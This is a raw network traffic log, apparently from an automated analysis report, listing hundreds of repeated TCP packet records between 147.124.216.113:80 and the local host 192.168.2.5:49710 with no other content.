                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
